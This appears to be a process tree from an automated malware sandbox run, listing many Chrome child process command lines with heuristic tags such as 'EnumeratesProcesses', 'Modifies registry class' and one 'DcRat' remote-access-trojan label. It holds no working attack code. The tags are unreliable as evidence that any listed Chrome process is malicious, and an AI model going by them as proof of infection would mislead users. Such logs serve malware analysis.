- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1664 /prefetch:2
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2016 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3024 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3032 /prefetch:1
  - DcRat
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4612 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4444 /prefetch:8
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4876 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5764 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5376 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6336 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6588 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1568 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1564 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6656 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6628 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3020 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3104 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6896 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6512 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7052 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7136 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6812 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3236 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6128 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7152 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6816 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4404 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6756 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6924 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=976 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1588 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5836 /prefetch:2
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2236 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6592 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4836 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5320 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4492 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5080 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6148 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6168 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5144 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3084 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5196 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1588 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7116 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=892 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4504 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6576 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7144 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4512 /prefetch:8
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7108 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3192 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
- "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:1
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5832 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6364 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1588 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,6756952905855970268,11018176816301747840,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6132 /prefetch:82⤵
